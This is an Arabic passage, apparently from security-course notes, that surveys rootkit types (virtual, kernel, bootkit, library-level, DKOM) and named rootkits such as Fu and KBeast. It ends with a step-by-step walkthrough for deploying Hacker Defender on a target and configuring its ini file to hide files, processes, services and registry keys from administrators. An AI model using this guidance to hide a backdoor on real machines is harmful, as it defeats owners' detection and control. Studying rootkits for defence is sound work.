اﺳﺗﻐﻼل ﺛﻐرات exploitﺗؤدي ﻟﺗﻌطﯾل crashﺧدﻣﺔ serviceاو ﺗﻌطﯾل ﻛل ال VMﻣﻣﺎ ﯾﻣﻛن اﻟروت ﻛﯾت ﻣن اﻟوﺻول اﻟﻲ ال Host
.machineاﯾﺿﺎ ﻣن اھم طرق ﺗﺧطﻲ ال VMھﻲ اﺳﺗﻐﻼل اﻟــ ComChannelوھﻲ ﻗﻧوات اﺗﺻﺎل ﺑﯾن ال gust OSوال host OS
ﺑﻌد ﻋﻣﻠﯾﺔ اﻟوﺻول اﻟﻲ ال Host Machineﺗﺗم ﻋﻣﻠﯾﺔ اﻟﺳﯾطرة ﻋﻠﻰ ال Hypervisorﻋن طرﯾﻖ ﻣﺎ ﯾﻌرف ﺑـ Hijacking the Hypervisor
ﻓﺑﺳﯾطرة اﻟروت ﻛﯾت ﻋﻠﻰ ال hypervisorﻓﮭو ﯾﺳﯾطر ﻋﻠﻰ Virtualizationوﺑﺎﻟﺗﺎﻟﻲ ﯾﺳﺗطﯾﻊ اﻟﺳﯾطرة ﻋﻠﻰ ﻛل اﻟﻧظﺎم ﺳواء VMاو
.HostVM
ﻣن أﺷﮭر اﻧواع ال Virtual Rootkitsھو
SubVirtﺑرﻣﺟﺔ Samuel T. King and Peter M.ﺗم ﻋﻣﻠﺔ ﻓﻲ ﺟﺎﻣﻌﺔ. Michigan
Blue Pillﺑرﻣﺟﺔ Joanna Rutkowskaوھو ﻣﺧﺻص ﻟﻣﻌﺎﻟﺞ. AMD-V
Vitriolﺑرﻣﺟﺔ Dino Dai Zoviﻣﺧﺻص ﻟﻣﻌﺎﻟﺞ. Intel VT
Kernel-Level Rootkit
اﻟﻧواة/اﻟﻛﯾرﻧل ھﻲ ﺟوھر ﻧظﺎم اﻟﺗﺷﻐﯾل .ھذا اﻟﻧوع ھو اﻻﺧطر ﻷﻧﮫ ﯾﺻﯾب ﻧواة اﻟﻧظﺎم وھو ال Kernelوﻗدرﺗﮫ ﻋﻠﻰ اﻟﺗﺧﻔﻲ ﻛﺑﯾرة وﯾﺻﻌب
اﻛﺗﺷﺎﻓﮫ ﺑﺎﻟﺑراﻣﺞ اﻟﺗﻘﻠﯾدﯾﺔ وﯾﺣﺗﺎج اﻟﻲ ﺗﺣﻠﯾل ﯾدوي ﻷﺧﺻﺎﺋﻲ اﻟﻛﯾرﻧل ﺣﺗﻰ ﺗﺗﻣﻛن ﻣن اﻛﺗﺷﺎﻓﮫ .وھذا ﯾﻘوم ﺑﺗﻐطﯾﺔ backdoorsﻋﻠﻰ
اﻟﻛﻣﺑﯾوﺗر وﯾﺗم إﻧﺷﺎﺋﮫ ﻣن ﺧﻼل ﻛﺗﺎﺑﺔ ﺗﻌﻠﯾﻣﺎت ﺑرﻣﺟﯾﺔ إﺿﺎﻓﯾﺔ أو ﻋن طرﯾﻖ اﺳﺗﺑدال أﺟزاء ﻣن ﻛود اﻟﻧواة/اﻟﻛﯾرﻧل ﻣﻊ اﻛواد ﻣﻌدﻟﮫ وﯾﺗم ذﻟك
ﻋﺑر ﺑراﻣﺞ ﺗﺷﻐﯾل اﻷﺟﮭزة ) (device driverﻓﻲ Windowsأو وﺣداة اﻟﻧواة ) (loadable kernel moduleﻓﻲ ﻟﯾﻧﻛس .ﻓﺈذا ﻛﺎن
ھﻧﺎك أي ﺧطﺎ او bugsﻓﻲ رﻣز ،Rootkitsﻓﺎن ھذا ﺳوف ﯾؤﺛر ﻋﻠﻰ اﺳﺗﻘرار اﻟﻧظﺎم إﻟﻰ ﺣد ﻛﺑﯾر ﻣن ﻗﺑل Rootkitsﻋﻠﻰ ﻣﺳﺗوى
اﻟﻧواة .ﻟﮭﺎ ﻧﻔس اﻣﺗﯾﺎزات ﻧظﺎم اﻟﺗﺷﻐﯾل ،وﺑﺎﻟﺗﺎﻟﻲ ﻓﮭﻲ ﺻﻌﺑﺔ اﻟﻛﺷف واﻻﻋﺗراض أو ﺗﺧرﯾب ﻋﻣﻠﯾﺎت ﻧظم اﻟﺗﺷﻐﯾل.
Application-level Rootkit
Application-level rootkitﺗﻌﻣل داﺧل ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ﻋن طرﯾﻖ اﺳﺗﺑدال ﻣﻠﻔﺎت ﺗطﺑﯾﻖ ﻣﻌﯾن ﻣﻊ Rootkitsأو ﻋن طرﯾﻖ
ﺗﻌدﯾل اﻟﺗطﺑﯾﻘﺎت اﻟﺣﺎﻟﯾﺔ ﻣﻊ ، injected code ، patchesاﻟﺦ.
Hardware/Firmware Rootkit
) Boot-loader-level Rootkit (Bootkitﺗﻌﻣل إﻣﺎ ﻋن طرﯾﻖ اﺳﺗﺑدال أو ﺗﻌدﯾل ﻣﺣﻣل اﻹﻗﻼع ) (boot loaderﺑواﺣد أﺧر .ﯾﻣﻛن
ﺗﻔﻌﯾﻠﮭﺎ ﺣﺗﻰ ﻗﺑل ﺑدء ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل .ﻟذﻟك Boot-loader-level Rootkit (Bootkit) ،ھﻲ اﻟﺗﮭدﯾدات ﺧطﯾرة ﻋﻠﻰ اﻷﻣن ﻷﻧﮭﺎ
ﯾﻣﻛن أن ﺗﺳﺗﺧدم ﻻﺧﺗراق ﻣﻔﺎﺗﯾﺢ اﻟﺗﺷﻔﯾر وﻛﻠﻣﺎت اﻟﺳر.
Library-level Rootkits
Library-level rootkitsﯾﻌﻣل ﻓﻲ ﻣﺳﺗوى اﻋﻠﻰ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﻋﺎدة ﯾﻘوم ﺑﺗﺻﺣﯾﺢ ،اﺻطﯾﺎد ،أو ﯾﺣل ﻣﺣل system callsﻣﻊ
إﺻدارات backdoorﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﻣﺟﮭوﻟﯾﺔ اﻟﻣﮭﺎﺟم .ﺣﯾث ﺗﻌﻣل ﻋﻠﻰ اﺳﺗﺑدال system callsاﻷﺻﻠﻲ ﻣﻊ واﺣده أﺧرى ﻣزﯾﻔﮫ/وھﻣﯾﮫ
ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟﻣﮭﺎﺟم.
Inline function hookingھﻲ ﺗﻘﻧﯾﺔ ﺣﯾث ﯾﻘوم rootkitsﺑﺗﻐﯾر ﺑﻌض اﻟﺑﺎﯾت ﻣن وظﯾﻔﺔ داﺧل core system DLLsﻣﺛل
) ، (kernel32.dll and ntdll. dllووﺿﻊ اﻟﺗﻌﻠﯾﻣﺎت ﺑﺣﯾث أن اﺳﺗدﻋﺎء أي ﻋﻣﻠﯾﺔ ﯾﻣر أوﻻ ﻋﻠﻰ .rootkits
Direct Kernel Object Manipulation (DKOM) rootkitsھﻲ ﻗﺎدرة ﻋﻠﻰ ﺗﺣدﯾد ﻣﻛﺎن واﻟﺗﻼﻋب ﻓﻲ أي ﻣن ﻋﻣﻠﯾﺎت اﻟﻧظﺎم
) (System processاﻟﻣوﺟودة ﻓﻲ ھﯾﺎﻛل ذاﻛرة kernelوﺗﺻﺣﯾﺢ ) (Patchذﻟك أﯾﺿﺎ .وھذا ﯾﻣﻛﻧﮫ أﯾﺿﺎ إﺧﻔﺎء اﻟﻌﻣﻠﯾﺎت واﻟﻣﻧﺎﻓذ ،ﺗﻐﯾر
اﻻﻣﺗﯾﺎزات ،ﺗﺿﻠﯾل ﻣﺷﺎھد Windows event viewerدون أي ﻣﺷﻛﻠﺔ ﻋن طرﯾﻖ اﻟﺗﻼﻋب ﻓﻲ ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺎت اﻟﻧﺷطﺔ ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل،
وﺗﻐﯾﯾر اﻟﺑﯾﺎﻧﺎت داﺧل ھﯾﺎﻛل ﻣﻌرﻓﺎت اﻟﻌﻣﻠﯾﺔ) . (PROCESS IDENTIFIERS structuresﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻟوﺻول ﻣن اﻟﻧوع
اﻟﻘراءة/اﻟﻛﺗﺎﺑﺔ ) (read/write accessإﻟﻰ اﻟﺟﮭﺎز/اﻟذاﻛرة اﻟﻔﻌﻠﯾﺔ ). (Device\Physical Memory object
DKOM rootkitsﺗﻘوم ﺑﺈﺧﻔﺎء اﻟﻌﻣﻠﯾﺔ ﻋن طرﯾﻖ ﻋدم ذﻛرھﺎ/اﺧﻔﺎﺋﮭﺎ ﻣن ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺎت.
Rootkit: Fu
Fuھو infection databaseواﻟﺗﻲ ﺗﻌﻣل ﺑﺎﺳﺗﺧدام ) Direct Kernel Object Manipulation (DKOMوﯾﺄﺗﻲ ﻣﻊ اﺛﻧﯾن ﻣن
اﻟﻣﻛوﻧﺎتthe dropper (fu.exe) ،و) The Fu rootkit. the driver (msdirectx.sysﯾﻌدل ﻓﻲ ﻛﺎﺋن اﻟﻛﯾرﻧل )(kernel object
واﻟذي ﯾﻣﺛل اﻟﻌﻣﻠﯾﺎت ﻓﻲ اﻟﻧظﺎم .ﺟﻣﯾﻊ ﻛﺎﺋﻧﺎت اﻟﻛﯾرﻧل ) (kernel process objectsﺗرﺗﺑط ﻣﻊ ﺑﻌﺿﮭﺎ اﻟﺑﻌض .ﻋﻧدﻣﺎ ﯾطﻠب اﻟﻣﺳﺗﺧدم ﻣﺛﻼ
ﻋﻣﻠﯾﺔ TaskMgr.exeواﻟذي ﯾطﻠب ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل ﻗﺎﺋﻣﺔ ﻟﺟﻣﯾﻊ اﻟﻌﻣﻠﯾﺎت ﻣن ﺧﻼل ، APIﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾذھب ﻟﺟﻣﯾﻊ اﻟﻠﻧﻛﺎت
اﻟﺧﺎﺻﺔ ﺑﺎﻟﻌﻣﻠﯾﺎت ) (process objectsاﻟﻘﺎﺋﻣﺔ ﺛم ﯾﻌود ﺑﺎﻟﻣﻌﻠوﻣﺎت اﻟﻣﻧﺎﺳﺑﺔ .ﯾﺄﺗﻲ ھﻧﺎ دور اﻟروت ﻛت ﻓو واﻟذي ﯾﻘوم ﺑﺈﻟﻐﺎء ﺟﻣﯾﻊ اﻟرواﺑط
اﻟﻣﺗﺻﻠﺔ ) (unlinkedﺑﺎﻟﻌﻣﻠﯾﺎت اﻟذي ﯾرﯾد إﺧﻔﺎﺋﮭﺎ .ﻟذﻟك ،ﯾﻣﻛﻧﺎ اﺧﻔﺎء اﻟﻌدﯾد ﻣن اﻟﺗطﺑﯾﻘﺎت ،ﺣﯾث ﻻ ﺗوﺟد ﻋﻣﻠﯾﺔ.
ﯾﻣﻛن Rootkit: Fuأﯾﺿﺎ إﺧﻔﺎء وﺳرد ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺎت وﺑراﻣﺞ اﻟﺗﺷﻐﯾل ) (driversﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت Hookingاﻟﻣﺧﺗﻠﻔﺔ .ﯾﻣﻛﻧك أﯾﺿﺎ
إﺿﺎﻓﺔ أي ﻣن اﻻﻣﺗﯾﺎزات ﻷي ﻣن اﻟﻌﻣﻠﯾﺎت .ھذا ﯾﻣﻛن أن ﯾؤدي اﻟﻌدﯾد ﻣن اﻹﺟراءات ﻓﻲ the Windows event viewerوﺗظﮭر ﻛﺄﻧﮭﺎ
ﺷﺧص آﺧر.
Rootkit: KBeast
) KBeast (Kernel Beastھو kernel rootkitواﻟذي ﯾﻘوم ﺑﺗﺣﻣﯾل ﻧﻔﺳﮫ ﻛﺎﻧﮫ وﺣدة ﻛﯾرﻧل ) .(kernel moduleﯾدﻋم إﺻدارات
اﻟﻛﯾرﻧل .2.6.35 ,2.6.32 ,2.6.18 ,2.6.16ﯾوﻓر اﻟوﺻول ﻋن ﺑﻌد إﻟﻰ اﻷﻧظﻣﺔ ﺑﺎﺳﺗﺧدام ﻋﻧﺻر .userland componentﺑﺎﺳﺗﺧدام
وﺣدة اﻟﻧواة )اﻟﻛﯾرﻧل( ،ﯾﻣﻛن أن ﯾﺻﺑﺢ userland backdoor componentﻏﯾر ﻣرﺋﻲ ﺑﺎﻟﻧﺳﺑﺔ ﻟﺗطﺑﯾﻘﺎت userlandاﻷﺧرى .ھذا
ﯾﻣﻛﻧﮫ إﺧﻔﺎء اﻟﻣﻠﻔﺎت ،واﻟﻣﺟﻠدات ،واﻟﻌﻣﻠﯾﺎت ) (ps, pstree, top, lsofاﻟﺗﻲ ﺗﺑدأ ﻣﻊ اﻟﻘﯾم اﻟﻣﻌرﻓﺔ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم .ﯾﻣﻛﻧك اﺳﺗﺧدام ﻗدرات
ال Keyloggingﻻﻟﺗﻘﺎط أﻧﺷطﺔ اﻟﻣﺳﺗﺧدم .ﻟﺗﻧﻔﯾذ واﺟﮭﺔ netstatﻓﻲ KBeast ،userlandﯾﺣﺻل ﻋﻠﻰ اﻟوﺻول اﻟﻰ اﻟﻧظﺎم ﻣن ﺧﻼل
اﺻطﯾﺎد ) (hockingﺟدول اﺳﺗدﻋﺎءات اﻟﻧظﺎم وھﯾﺎﻛل اﻟﻌﻣﻠﯾﺎت.
أول اﻷﺷﯾﺎء؛ ﻻ ﺗدع اﻻﺳم ﯾﺧدﻋك Hacker Defender ،ھو .rootkitأﻧﮭﺎ ﻟﯾﺳت وﺳﯾﻠﺔ ﻟﻠدﻓﺎع ﻋن اﻟﻣﺗﺳﻠﻠﯾن! Hacker Defender
ھو rootkitﺧﺎص ﺑﺎﻟوﯾﻧدوز واﻟﺗﻲ ھﻲ ﺳﮭﻠﺔ ﻧﺳﺑﯾﺎ ﻻﻓﮭم واﻻﻋداد Hacker Defender .ھو وﯾﻧدوز روت ﻛﯾت ،وھذا ﯾﻌﻧﻲ أﻧك ﺳوف
ﺗﺣﺗﺎج إﻟﻰ ﻧﺷرھﺎ ﻋﻠﻰ ﺟﮭﺎز وﯾﻧدوز .ﺳوف ﺗﺣﺗﺎج أﯾﺿﺎ إﻟﻰ اﻟﺑﺣث ﻓﻲ اﻹﻧﺗرﻧت ﻟﻠﺣﺻول ﻋﻠﻰ ﻧﺳﺧﺔ ﻣن ،Hacker Defenderﻣن
اﻟﻣؤﻛد ﯾﺟب أن ﺗﻛون أﻛﺛر ﺣذرا ﻋﻧد ﺗﻧزﯾل وﺗرﻛﯾب اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ ﻋﻣدا)! (malware program
ھﻧﺎك ﺛﻼﺛﺔ ﻣﻠﻔﺎت رﺋﯾﺳﯾﺔ ﻣﺗﺿﻣﻧﺔ ﻓﻲ Hacker Defenderاﻟﺗﻲ ﯾﺟب أن ﺗﻛون ﻋﻠﻰ ﻋﻠم،hxdef100.ini ،hxdef100.exe :
و .bdcli100.exeﻋﻠﻰ اﻟرﻏم ﻣن أن اﻟﻣﻠف ﻣﺿﻐوط .ﺳﯾﺗﺿﻣن اﻟﻌدﯾد ﻣن اﻟﻣﻠﻔﺎت اﻷﺧرى ،ﺳﻧرﻛز اھﺗﻣﺎﻣﻧﺎ ﻋﻠﻰ اﻟﻣﻠﻔﺎت اﻟﺛﻼﺛﺔ ھذه.
Hxdef100.exeھو اﻟﻣﻠف اﻟﻘﺎﺑل ﻟﻠﺗﻧﻔﯾذ اﻟذي ﯾدﯾر Hacker Defenderﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف Hxdef100.ini .ھو ﻣﻠف اﻻﻋداد
ﺣﯾث ﻣن ﺧﻼﻟﮫ ﯾﻣﻛن إﻧﺷﺎء اﻟﺧﯾﺎرات اﻟﺗﻲ ﻧرﯾد اﺳﺗﺧداﻣﮭﺎ وﻗﺎﺋﻣﺔ اﻟﺑراﻣﺞ أو اﻟﻣﻠﻔﺎت أو اﻟﺧدﻣﺎت اﻟﺗﻲ ﻧرﯾد أن إﺧﻔﺎﺋﮭﺎ Bdcli100.exe .ھو
ﺑرﻧﺎﻣﺞ اﻟﻌﻣﯾل اﻟذي ﯾﺳﺗﺧدم ﻟﻼﺗﺻﺎل ﻣﺑﺎﺷرة ﻣﻊ backdoorاﻟﺧﺎص ب .Hacker Defender
ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﺗﺣﻣﯾل اﻟﻣﻠف hxdef100.zipإﻟﻰ اﻟﮭدف اﻟﺧﺎص ﺑك ،ﻓﺈﻧك ﺗﺣﺗﺎج إﻟﻰ ﻓك اﻟﺿﻐط ﻋﻠﯾﮫ .ﻹﺑﻘﺎء اﻻﻣور ﺑﺳﯾطﺔ ﻗدر
اﻹﻣﻛﺎن ،ﻓﻣن اﻷﻓﺿل إﻧﺷﺎء ﻣﺟﻠد واﺣد ﻋﻠﻰ ﺟذر ﻣﺣرك اﻷﻗراص اﻟﮭدف اﻟﺑﺎرﺗش اﻟذي ﯾﺣﻣل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ).(partition C
ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،ﺳوف ﻧﻘوم ﺑﺈﻧﺷﺎء ﻣﺟﻠد ﻋﻠﻰ اﻟﻣﺣرك )\(C:ﯾدﻋﻰ “ .(for rootkit) ”rkﯾﺗم وﺿﻊ ﻛﺎﻓﺔ اﻟﻣﻠﻔﺎت ﺑﻣﺎ ﻓﻲ ذﻟك
hxdef100.zipوﻣﺣﺗوﯾﺎﺗﮫ اﻟﻐﯾر ﻣﺿﻐوطﺔ داﺧل ھذا اﻟﻣﺟﻠد .ھذا ﺳﯾﺟﻌل ﻣن اﻻﺳﮭل ﺗﺗﺑﻊ اﻟﻣﻠﻔﺎت ،وﺗوﻓﯾر ﻣوﻗﻊ ﻣرﻛزي ﻟﺗﺣﻣﯾل أدوات
إﺿﺎﻓﯾﺔ ،وﺟﻌل إﺧﻔﺎء ھذا اﻟﻣﺳﺗودع اﻟﻣرﻛزي أﺳﮭل ﺑﻛﺛﯾر .وﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﻓك ﺿﻐط ﻣﻠف ،hxdef100ﯾﻣﻛﻧك أن ﺗﺑدأ ﻓﻲ إﻋداد
Hacker Defenderﻋن طرﯾﻖ ﺗﻌدﯾل اﻟﻣﻠف .hxdef100.ini
ﺑﻣﺟرد ﻓﺗﺢ اﻟﻣﻠف ،.iniﺳﺗرى ﻋدد ﻣن اﻷﻗﺳﺎم اﻟﻣﺧﺗﻠﻔﺔ .ﯾﺑدأ ﻛل ﻗﺳم رﺋﯾﺳﻲ ﻣﻊ اﺳم ﻣﻐﻠﻖ ﻓﻲ ﻗوس ﻣرﺑﻊ .وﯾﺑﯾن اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻣﺛﺎل ﻟﻣﻠف
اﻟﺗﻛوﯾن/اﻻﻋداد اﻻﻓﺗراﺿﻲ:
ﻛﻣﺎ ﺗرون ﻣن اﻟﺷﻛل اﻟﺳﺎﺑﻖ ،ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﻌﻧﺎوﯾن ﺑﻣﺎ ﻓﻲ ذﻟك ]اﻟﺟدول ﻣﺧﻔﻲ)] ،[ (hidden tableاﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ )(hidden process
[] ،ﻋﻣﻠﯾﺎت اﻟﺟذر)] ،[ (root processاﻟﺧدﻣﺎت اﻟﻣﺧﻔﯾﺔ) ،[ (hidden servicesوﻏﯾرھﺎ .ﺳﺗﻼﺣظ أﯾﺿﺎ أن ﻣﻠف ﺗﻛوﯾن Hacker
Defenderﯾﺗﺿﻣن زوﺟﯾن ﻣن اﻹدﺧﺎﻻت اﻻﻓﺗراﺿﯾﺔ .ﺗﺳﺗﺧدم ھذه اﻹدﺧﺎﻻت ﻹﺧﻔﺎء ﻣﻠﻔﺎت Hacker Defenderواﻟﺗﻲ ﺑﻧﯾت ﻓﻲ
backdoorﻟذﻟك ﻟم ﯾﻛن ﻟدﯾك ﻟﺗﻌدﯾل ھذه أو إﺟراء ﺗﻐﯾﯾرات إﺿﺎﻓﯾﺔ .ﻻﺣظ أﯾﺿﺎ أن اﻟﻣﻠف iniﯾدﻋم اﺳﺗﺧدام أﺣرف wildcardsﻣﻊ
اﻟﺣرف "*" .ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ،أي اﻟﻣﻠف ﯾﺑدأ ﺑﺎﻟﺣروف hxdefﺳﯾﺗم إﺿﺎﻓﺗﮫ ﺗﻠﻘﺎﺋﯾﺎ اﻟﻰ اﻟﻘﺎﺋﻣﺔ.
طرﯾﻘﺔ اﻟﻌﻣل ﺑداﯾﺔ ﻣن اﻟﺟزء اﻟﻌﻠوي ﻣن ﺧﻼل ﻛل اﻟﻌﻧﺎوﯾن .ﯾﺣﻣل ﻋﻧوان اﻟﻘﺳم اﻷول ]اﻟﺟدول اﻟﻣﺧﻔﻲ) .[ (hidden tableأي ﻣن اﻟﻣﻠﻔﺎت
أو اﻟﻣﺳﺎرات أو اﻟﻣﺟﻠدات اﻟﻣدرﺟﺔ ﻓﻲ إطﺎر ھذا اﻟﺑﻧد ﺳوف ﺗﻛون ﻣﺧﻔﯾﺔ ﻣن اﻟﻣﺳﺗﻛﺷف ) (explorerوﻣدﯾر اﻟﻣﻠﻔﺎت )(file manager
اﻟﻣﺳﺗﺧدﻣﺔ ﻣن ﻗﺑل .Windowsإذا ﻗﻣت ﺑﺈﻧﺷﺎء ﻣﺟﻠد ﻋﻠﻰ ﺟذر ﻣﺣرك اﻷﻗراص ﻛﻣﺎ اﻗﺗرح ﻓﻲ وﻗت ﺳﺎﺑﻖ ،ﺗﺄﻛد ﻣن إدراﺟﮫ ھﻧﺎ .ﺑﻧﺎء ﻋﻠﻰ
اﻟﻣﺟﻠد اﻟذي ﻗﻣﻧﺎ ﺑﺈﻧﺷﺎﺋﮫ ﻓﻲ اﻟﻣﺛﺎل اﻟﺳﺎﺑﻖ ،ﻓﺳوف ﻧﻘوم ﺑﺈدراج " " rkﻓﻲ اﻟﻣﻘطﻊ ]اﻟﺟدول اﻟﻣﺧﻔﻲ).[ (hidden table
ﻓﻲ اﻟﻣﻘطﻊ ]اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ ) ،[ (hidden processﺳوف ﺗﻘوم ﺑﺳرد ﻗﺎﺋﻣﺔ ﻛل ﻣن اﻟﻌﻣﻠﯾﺎت أو اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗرﯾد أن ﺗﻛون ﻣﺧﺑﺄة ﻋن
اﻟﻣﺳﺗﺧدم .ﻛل ﻣن اﻟﻌﻣﻠﯾﺎت اﻟﻣذﻛورة ھﻧﺎ ﺳوف ﺗﻛون ﻣﺧﻔﯾﺔ ﻋن اﻟﻣﺳﺗﺧدم اﻟﻣﺣﻠﻲ ﻋﻧد ﻋرض اﻟﻌﻣﻠﯾﺎت ﻗﯾد اﻟﺗﺷﻐﯾل ﺣﺎﻟﯾﺎ ﻣﻊ ﻣدﯾر اﻟﻣﮭﻣﺎت
) .(task managerﻛﻣﺛﺎل ،ﻧﻔﺗرض أﻧك ﺗرﯾد إﺧﻔﺎء ﺑرﻧﺎﻣﺞ اﻵﻟﺔ اﻟﺣﺎﺳﺑﺔ .ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ،ﺳوف ﺗﺣﺗﺎج ﻟﺳرد ﺑرﻧﺎﻣﺞ اﻟﺣﺎﺳﺑﺔ ﺗﺣت اﻟﻣﻘطﻊ
]اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ ) .[ (hidden processﺑﺈﺿﺎﻓﺔ calc.exeإﻟﻰ اﻟﻣﻘطﻊ ]اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ ) ،[ (hidden processﻓﺈن اﻟﻣﺳﺗﺧدم ﻟن ﯾﻛون
ﻗﺎدرا ﻋﻠﻰ اﻟﻌﺛور أو اﻟﺗﻔﺎﻋل ﻣﻊ ﺑرﻧﺎﻣﺞ اﻵﻟﺔ اﻟﺣﺎﺳﺑﺔ .ﺑﻣﺟرد ﺑدء rootkitﻟدﯾﻧﺎ ،ﻓﻠن ﯾوﺟد أي ﺑرﻧﺎﻣﺞ آﻟﺔ ﺣﺎﺳﺑﺔ ﻣﺗوﻓرة ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر.
ﯾﺳﺗﺧدم اﻟﻘﺳم ]ﻋﻣﻠﯾﺎت اﻟﺟذر) ،[ (root processﻟﻠﺳﻣﺎح ﻟﺑراﻣﺞ ﻣﻌﯾﻧﮫ ﻟﻠﺗﻔﺎﻋل ﻣﻊ وﻋرض اﻟﻣﺟﻠدات واﻟﻌﻣﻠﯾﺎت اﻟﻣﺧﻔﯾﺔ ﺳﺎﺑﻘﺎ .ﺗذﻛر أﻧﮫ ﻓﻲ
اﻷﺟزاء اﻟﺳﺎﺑﻘﺔ ،ﻛﻧﺎ ﻗد ازاﻟﻧﺎ ﻗدرة ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻟﻠﻛﺷف ﻋن ،اﻟﻧظر ،واﻟﺗﻔﺎﻋل ﻣﻊ ﻣﺧﺗﻠف اﻟﻣﻠﻔﺎت واﻟﺑراﻣﺞ .ﻓﻲ ھذا اﻟﻘﺳم ،ﻧﻘوم ﺑﺳرد
ﻗﺎﺋﻣﺔ اﻟﺑراﻣﺞ اﻟﺗﻲ ﻧرﯾدھﺎ ان ﺗﺣﺻل ﻋﻠﻰ اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ .ﺑﺣﯾث ﯾﺳﻣﺢ ﻟﻠﺑراﻣﺞ اﻟﻣذﻛورة ھﻧﺎ ﻟﻣﺷﺎھدة واﻟﺗﻔﺎﻋل ﻣﻊ ﺑراﻣﺞ ﻋﻠﻰ اﻟﻧظﺎم ،ﺑﻣﺎ
ﻓﻲ ذﻟك ﺗﻠك اﻟواردة ﻓﻲ ]اﻟﺟدول اﻟﻣﺧﻔﻲ) [ (hidden tableو ]اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ ).[ (hidden process
إذا ﻛﺎن ﻟدﯾك أي ﻣن اﻟﺑراﻣﺞ اﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ اﻟﺗﺛﺑﯾت ﻛﺧدﻣﺔ أو ﺗﺷﻐﯾل اﻟﺧدﻣﺎت ﻣﺛل ﺑروﺗوﻛول ﻧﻘل اﻟﻣﻠﻔﺎت ،ﺧوادم اﻟﺷﺑﻛﺔ،backdoor ،
وﻣﺎ إﻟﻰ ذﻟك ،ﻓﺳوف ﺗﺣﺗﺎج إﻟﻰ إدراﺟﮭﺎ ﻓﻲ اﻟﻘﺳم ]اﻟﺧدﻣﺎت اﻟﻣﺧﻔﯾﺔ) .[ (hidden servicesﻣﺛل ﻛل اﻷﻗﺳﺎم أﺧرى ،ﻓﺈن اﻟﻘﺳم ]اﻟﺧدﻣﺎت
اﻟﻣﺧﻔﯾﺔ[ ﯾﻘوم ﺑﺈﺧﻔﺎء ﻛل ﻣن اﻟﺧدﻣﺎت اﻟﻣذﻛورة .ﻣرة أﺧرى ،ﻋﻧد اﻟﺗﻌﺎﻣل ﻣﻊ ﻣدﯾر اﻟﻣﮭﻣﺎت) ، (task mangerﺳﯾﺗم أﺧﻔﺎء أي ﻣن اﻟﺑرﻧﺎﻣﺞ
اﻟﻣذﻛورة ھﻧﺎ ﻣن "ﻗﺎﺋﻣﺔ اﻟﺧدﻣﺎت".
ﯾﻣﻛﻧك اﺳﺗﺧدام ] [Hidden REGKEYSﻹﺧﻔﺎء ﻣﻔﺎﺗﯾﺢ ﺗﺳﺟﯾل ) (REGKEYﻣﻌﯾﻧﺔ .ﺗﻘرﯾﺑﺎ ﺟﻣﯾﻊ ﺑراﻣﺞ إﻧﺷﺎء ﻣﻔﺎﺗﯾﺢ اﻟﺗﺳﺟﯾل ﻋﻧد
ﺗرﻛﯾﺑﮭﺎ أو ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر .ﻗﺳم ] [Hidden REGKEYSﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء ﻛل ﻣن ھذه اﻟﻣﻔﺎﺗﯾﺢ .وﺳوف ﺗﺣﺗﺎج إﻟﻰ
اﻟﺗﺄﻛد ﻣن ذﻛرھﺎ ﺟﻣﯾﻌﺎ ﻣن أﺟل ﺗﺟﻧب اﻟﻛﺷف.
ﺑﻌض اﻟﺣﺎﻻت ﺗﺗطﻠب ﺳﯾطرة أﻛﺛر ﻣن ﻣﺟرد إﺧﻔﺎء ﻣﻔﺎﺗﯾﺢ ﺑﺄﻛﻣﻠﮫ .إذا ﻛﺎن اﻟﻣﻔﺗﺎح ﻣﻔﻘود )أو ﻣﺧﻔﻰ( ،ﻓﺎن ﻣﺳؤول اﻟﻧظﺎم ﻗد ﯾﺷﺗﺑﮫ ﻓﻲ ذﻟك.
ﻟﻠﺗﻌﺎﻣل ﻣﻊ ھذه اﻟﺣﺎﻻت ،ﻓﺎن Hacker Defenderﯾﺳﻣﺢ ﻟﻧﺎ ﺑﺎﺳﺗﺧدام اﻟﻘﺳم ] [Hidden RegValuesوھذا ﺳوف ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﻘﯾم
اﻟﻔردﯾﺔ ﺑدﻻ ﻣن اﻟﻣﻔﺗﺎح ﺑﺄﻛﻣﻠﮫ.
